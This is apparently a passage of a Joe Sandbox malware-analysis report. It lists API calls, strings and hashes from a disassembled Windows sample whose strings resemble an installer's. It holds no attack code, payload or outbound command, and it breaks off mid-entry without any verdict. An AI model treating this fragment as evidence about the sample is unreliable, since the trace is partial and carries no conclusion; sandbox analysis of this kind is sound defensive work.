                                                                          • Opcode Fuzzy Hash: e5f82f84354ef0ca283ae45606e551eda4c159cf8a0135734a08b6be587c5a6c
                                                                          • Instruction Fuzzy Hash: 933154706083849EE330EB65C945BDB77E89B86304F40483FB6C8D72D1DB79A9088767
                                                                          APIs
                                                                          • SendMessageA.USER32(00000000,000001A1,?,00000000), ref: 0044E161
                                                                            • Part of subcall function 0044C7A4: SendMessageA.USER32(00000000,000001A0,?,00000000), ref: 0044C7D6
                                                                          • InvalidateRect.USER32(00000000,00000000,00000001,00000000,000001A1,?,00000000), ref: 0044E1E5
                                                                            • Part of subcall function 0042BBC4: SendMessageA.USER32(00000000,0000018E,00000000,00000000), ref: 0042BBD8
                                                                          • IsRectEmpty.USER32(?), ref: 0044E1A7
                                                                          • ScrollWindowEx.USER32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000006), ref: 0044E1CA
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: MessageSend$Rect$EmptyInvalidateScrollWindow
                                                                          • String ID:
                                                                          • API String ID: 855768636-0
                                                                          • Opcode ID: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                          • Instruction ID: 2ff42263b9fd8d0bf3ebcb41181b8f96e25d68336b74147511caae446a0df0b7
                                                                          • Opcode Fuzzy Hash: 9a7a18137ec586f3ae39864321f244483684a0ffa01bccee3b65953e1ffa7791
                                                                          • Instruction Fuzzy Hash: A8114A72B4030127E310BA7E9C86B5B76899B88748F05483FB506EB383DEB9DC094399
                                                                          APIs
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00493DE8
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00493E03
                                                                          • OffsetRect.USER32(?,?,00000000), ref: 00493E1D
                                                                          • OffsetRect.USER32(?,00000000,?), ref: 00493E38
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: OffsetRect
                                                                          • String ID:
                                                                          • API String ID: 177026234-0
                                                                          • Opcode ID: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                          • Instruction ID: 626cbd3239d4ed1d666785e4d5506dc5f63added092c4cfac4a9a75855a5826e
                                                                          • Opcode Fuzzy Hash: cfbccf1d698e82d79065cf95299db1547cf674505700e5d727bb5bb08f6f6c11
                                                                          • Instruction Fuzzy Hash: EF217AB6704201AFD700DE69CD85EABBBEEEBC4304F14CA2AF554C7249D634ED0487A6
                                                                          APIs
                                                                          • GetCursorPos.USER32 ref: 00417270
                                                                          • SetCursor.USER32(00000000), ref: 004172B3
                                                                          • GetLastActivePopup.USER32(?), ref: 004172DD
                                                                          • GetForegroundWindow.USER32(?), ref: 004172E4
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Cursor$ActiveForegroundLastPopupWindow
                                                                          • String ID:
                                                                          • API String ID: 1959210111-0
                                                                          • Opcode ID: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                          • Instruction ID: d42235d32f12bbd537443306c781531a61dc82822ae97907460fdfc4b9dfd860
                                                                          • Opcode Fuzzy Hash: 8d64426bf1faa67f7e63d5b49e58984f19945b6ec6e4dfcc44bb455274275b92
                                                                          • Instruction Fuzzy Hash: E02183313086018BCB20EB69D885AD773B1AB44758F4545ABF895CB352D73DDC82CB89
                                                                          APIs
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A51
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A65
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A79
                                                                          • MulDiv.KERNEL32(?,00000008,?), ref: 00493A97
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                          • Instruction ID: 4fded1b76b16cf5233eb9f491647a43cf70802087f48ea21bc09c20ce05eabc8
                                                                          • Opcode Fuzzy Hash: b0bc83cb44cddb6cfb83e9cff79c84a8c4632dee95d4fc6912c32f85648e17c5
                                                                          • Instruction Fuzzy Hash: D011FE72604204ABCB40DEA9D8C4D9B7BECEF4D364B1541AAF918DB246D674ED408BA8
                                                                          APIs
                                                                          • GetClassInfoA.USER32(00400000,0041F480,?), ref: 0041F4B1
                                                                          • UnregisterClassA.USER32(0041F480,00400000), ref: 0041F4DA
                                                                          • RegisterClassA.USER32(00498598), ref: 0041F4E4
                                                                          • SetWindowLongA.USER32(00000000,000000FC,00000000), ref: 0041F51F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Class$InfoLongRegisterUnregisterWindow
                                                                          • String ID:
                                                                          • API String ID: 4025006896-0
                                                                          • Opcode ID: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
                                                                          • Instruction ID: 3ade520867520f28231aed23d56b060c1ae6e85fc3aaaf2b039856689379b016
                                                                          • Opcode Fuzzy Hash: 533d640a4b08feb0459202762eb42d0053809421209bdbe4521837a12811d117
                                                                          • Instruction Fuzzy Hash: 600152B12401047BCB10EF6DED81E9B37999769314B11413BBA05E72E1DA3A9C194BAD
                                                                          APIs
                                                                          • FindResourceA.KERNEL32(00400000,?,00000000), ref: 0040D227
                                                                          • LoadResource.KERNEL32(00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574,0000000A,REGDLL_EXE), ref: 0040D241
                                                                          • SizeofResource.KERNEL32(00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?,?,0047B574), ref: 0040D25B
                                                                          • LockResource.KERNEL32(74536563,00000000,00400000,72756F73,00400000,72756F73,0040A9C8,00400000,00000001,00000000,?,0040D184,00000000,?,00000000,?), ref: 0040D265
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Resource$FindLoadLockSizeof
                                                                          • String ID:
                                                                          • API String ID: 3473537107-0
                                                                          • Opcode ID: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                          • Instruction ID: 8b55825d53d46818f15098a3aa340eb6897fe62b828c159971ec5f2842f97e2f
                                                                          • Opcode Fuzzy Hash: 98a3eb2f97eb90f8deac50020965559c1c53970ac69ea9c81a72a03a0abc3839
                                                                          • Instruction Fuzzy Hash: ADF062736046046F8704EE9DA881D5B77ECDE88364310017FF908EB246DA38DD018B78
                                                                          APIs
                                                                          • VirtualAlloc.KERNEL32(?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 00401566
                                                                          • VirtualAlloc.KERNEL32(?,?,00002000,00000004,?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 0040158B
                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00100000,00002000,00000004,Mj,?,?,?,004018B4), ref: 004015B1
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                           • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                           • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$Alloc$Free
                                                                          • String ID: Mj
                                                                          • API String ID: 3668210933-209792402
                                                                          • Opcode ID: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
                                                                          • Instruction ID: 5daa563b5b1fa11dd2f788f5c35568dff97f2482912b9d75d2b1da0796ca24bc
                                                                          • Opcode Fuzzy Hash: 4642c5e47627af4fb9a65464f5cf053fdc587df3507c7da2e3a58868ba6a62e8
                                                                          • Instruction Fuzzy Hash: DFF0C2B1640320AAEB315A294C85F133AD8DBC5794F1040B6BE09FF3DAD6B8980082AD
                                                                          APIs
                                                                          • GetLastError.KERNEL32(00000000,00000000), ref: 0046EE29
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046EE3A
                                                                          • Setting NTFS compression on directory: %s, xrefs: 0046EDF7
                                                                          • Unsetting NTFS compression on directory: %s, xrefs: 0046EE0F
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on directory: %s$Unsetting NTFS compression on directory: %s
                                                                          • API String ID: 1452528299-1392080489
                                                                          • Opcode ID: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                          • Instruction ID: 1e7f5b79b7b83b0710ae0b74761658cb8013dc9fe861025df3af78f0f88b0ad9
                                                                          • Opcode Fuzzy Hash: 69acb3433b7424efc8733916a2e3fd5d2b01e13f314b1d1949af057b0dba6a86
                                                                          • Instruction Fuzzy Hash: B1016734E0824856CF04D7EEA0412DDBBE49F09314F4485EFA855DB383EB7A0A0987AB
                                                                          APIs
                                                                            • Part of subcall function 0042DD44: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,00481F57,?,00000001,?,?,00481F57,?,00000001,00000000), ref: 0042DD60
                                                                          • RegDeleteValueA.ADVAPI32(?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000,0045AEF5), ref: 004552F4
                                                                          • RegCloseKey.ADVAPI32(00000000,?,00000000,00000082,00000002,00000000,?,?,00000000,0045AECE,?,?,?,?,?,00000000), ref: 004552FD
                                                                          • RemoveFontResourceA.GDI32(00000000), ref: 0045530A
                                                                          • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 0045531E
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: CloseDeleteFontMessageNotifyOpenRemoveResourceSendValue
                                                                          • String ID:
                                                                          • API String ID: 4283692357-0
                                                                          • Opcode ID: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                          • Instruction ID: 219cbfe3a978a329188234ed78272d854ba8405160bd4c7ea72be768510c46b8
                                                                          • Opcode Fuzzy Hash: 697a476951aa0a0ca9570e552bc061f69c865505889b6d894dbdf5d1e046680c
                                                                          • Instruction Fuzzy Hash: A3F05EB574070036EA10B6B69C87F2F268C9F98746F10483BBA04EF2C3D97CD804562D
                                                                          APIs
                                                                          • GetLastError.KERNEL32(?,00000000), ref: 0046F5D5
                                                                          Strings
                                                                          • Failed to set NTFS compression state (%d)., xrefs: 0046F5E6
                                                                          • Unsetting NTFS compression on file: %s, xrefs: 0046F5BB
                                                                          • Setting NTFS compression on file: %s, xrefs: 0046F5A3
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast
                                                                          • String ID: Failed to set NTFS compression state (%d).$Setting NTFS compression on file: %s$Unsetting NTFS compression on file: %s
                                                                          • API String ID: 1452528299-3038984924
                                                                          • Opcode ID: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                          • Instruction ID: af1263a2bc2d08d5f84e5bf4467a93fc8ad6fd7f39d305876acfad47ab44e8ff
                                                                          • Opcode Fuzzy Hash: 2ae6e740da7d12cab45fc3fda2904aab771333dfed4c0176c99f618606694c86
                                                                          • Instruction Fuzzy Hash: 43016C30D0824865CF14DB9DA0412DDBBE49F09314F5485FFA895DB343EA790A0D8BAB
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLast$CountSleepTick
                                                                          • String ID:
                                                                          • API String ID: 2227064392-0
                                                                          • Opcode ID: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                          • Instruction ID: 04319ed9576db886230fb9bc867ee798ddcaac356600663dffa6fb38092a16ff
                                                                          • Opcode Fuzzy Hash: 0d6abcf2624c376c92be4fe051ac8c721ea0e8e4158ee005a25feb70aac8199d
                                                                          • Instruction Fuzzy Hash: 70E09B7230954149DA2935BF28C67BF5588CBC5764F145D3FF08DD6282C91C4C4796BE
                                                                          APIs
                                                                          • GetCurrentProcess.KERNEL32(00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A,00000000), ref: 00476CB5
                                                                          • OpenProcessToken.ADVAPI32(00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 00476CBB
                                                                          • GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CDD
                                                                          • CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008,?,?,?,00000001,00000000,00000002,00000000,0047F8E7), ref: 00476CEE
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                          • String ID:
                                                                          • API String ID: 215268677-0
                                                                          • Opcode ID: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                          • Instruction ID: 52cacee470f693cc175e787ed480d05e054b7fb82800b5b9fad0ca038f03fef1
                                                                          • Opcode Fuzzy Hash: 643da1b25484e25618dfc2f33770e0810dba7622c7134d6ef75615b708b11c8e
                                                                          • Instruction Fuzzy Hash: 04F01CA16447016ED600EAB5CD82A9B76DCEB44354F04883ABE98C72C1D678D808AA66
                                                                          APIs
                                                                          • GetLastActivePopup.USER32(?), ref: 0042425C
                                                                          • IsWindowVisible.USER32(?), ref: 0042426D
                                                                          • IsWindowEnabled.USER32(?), ref: 00424277
                                                                          • SetForegroundWindow.USER32(?), ref: 00424281
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ActiveEnabledForegroundLastPopupVisible
                                                                          • String ID:
                                                                          • API String ID: 2280970139-0
                                                                          • Opcode ID: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                          • Instruction ID: cc3e18b4355afb8de1117362fa5ee1cc3bb5bcb08e60588071b409dab7082488
                                                                          • Opcode Fuzzy Hash: 815aaf66aeb93fdb7eaca90ddf7e3ec79125ce151ba931028ab749093d5bac7c
                                                                          • Instruction Fuzzy Hash: DBE08691B02571929E71FA671881A9F018CCD45BE434602A7FD04F7243DB1CCC0041BC
                                                                          APIs
                                                                          • GlobalHandle.KERNEL32 ref: 00406287
                                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040628E
                                                                          • GlobalReAlloc.KERNEL32(00000000,00000000), ref: 00406293
                                                                          • GlobalLock.KERNEL32(00000000), ref: 00406299
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Global$AllocHandleLockUnlock
                                                                          • String ID:
                                                                          • API String ID: 2167344118-0
                                                                          • Opcode ID: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction ID: ad050c8fb554795a0ca7e59246f03ac17dd57b6c6051e6027a9978793207e39e
                                                                          • Opcode Fuzzy Hash: ccca6f24380267978f803e90f3f817f3fcf2956047d1379c6398f3f6a54b6072
                                                                          • Instruction Fuzzy Hash: A0B009C5814A05B9EC0833B24C0BD3F141CD88072C3808A6FB458BA1839C7C9C402A3D
                                                                          APIs
                                                                          • GetSystemMenu.USER32(00000000,00000000,0000F060,00000001), ref: 0046A1F3
                                                                          • EnableMenuItem.USER32(00000000,00000000,00000000), ref: 0046A1F9
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$EnableItemSystem
                                                                          • String ID: CurPageChanged
                                                                          • API String ID: 3692539535-2490978513
                                                                          • Opcode ID: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                          • Instruction ID: 7720c050ea6da0ef8e1be1b899a85f81ec2d70891b76be637dda81d079de5e74
                                                                          • Opcode Fuzzy Hash: ce3d69d9ba1a62642177f6d71e0f7aaa340e11e2d471205b7fc5bc675cd66b6b
                                                                          • Instruction Fuzzy Hash: 04B12834604604DFCB11DB59DA85EE973F5EF49308F2540F6E804AB362EB38AE51DB4A
                                                                          APIs
                                                                          • RegCloseKey.ADVAPI32(?,?,?,?,00000001,00000000,00000000,0047A685,?,00000000,00000000,00000001,00000000,004790B1,?,00000000), ref: 00479075
                                                                          Strings
                                                                          • Cannot access a 64-bit key in a "reg" constant on this version of Windows, xrefs: 00478EE9
                                                                          • Failed to parse "reg" constant, xrefs: 0047907C
                                                                          Memory Dump Source
                                                                          • Source File: 00000001.00000002.3303290146.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000001.00000002.3303252633.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303434785.0000000000498000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303475518.0000000000499000.00000008.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303509140.000000000049A000.00000004.00000001.01000000.00000004.sdmp
                                                                          • Associated: 00000001.00000002.3303552809.00000000004AA000.00000002.00000001.01000000.00000004.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_1_2_400000_j9htknb7BQ.jbxd
                                                                          Similarity
                                                                          • API ID: Close
                                                                          • String ID: Cannot access a 64-bit key in a "reg" constant on this version of Windows$Failed to parse "reg" constant
                                                                          • API String ID: 3535843008-1938159461
                                                                          • Opcode ID: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                          • Instruction ID: fcc941d39f61a36dc7ba98d018d7fa63e98928215e6e5a71d63c1788f81e571e
                                                                          • Opcode Fuzzy Hash: 6cfa3a26321e55d12a01db98da27023ce14a7644c07822183f99b0fb8cfb2842
                                                                          • Instruction Fuzzy Hash: F3818174E00148AFCF10EF95D485ADEBBF9AF49314F50816AE814B7391CB38AE05CB99
                                                                          APIs
                                                                          • GetForegroundWindow.USER32(00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 0048196F
                                                                          • SetActiveWindow.USER32(?,00000000,00481AC0,?,00000000,00481B01,?,?,00000001,?,00000000,00000000,00000000,?,0046AF84), ref: 00481981
                                                                          Strings
                                                                          • Will not restart Windows automatically., xrefs: 00481AA0
                                                                          Memory Dump Source
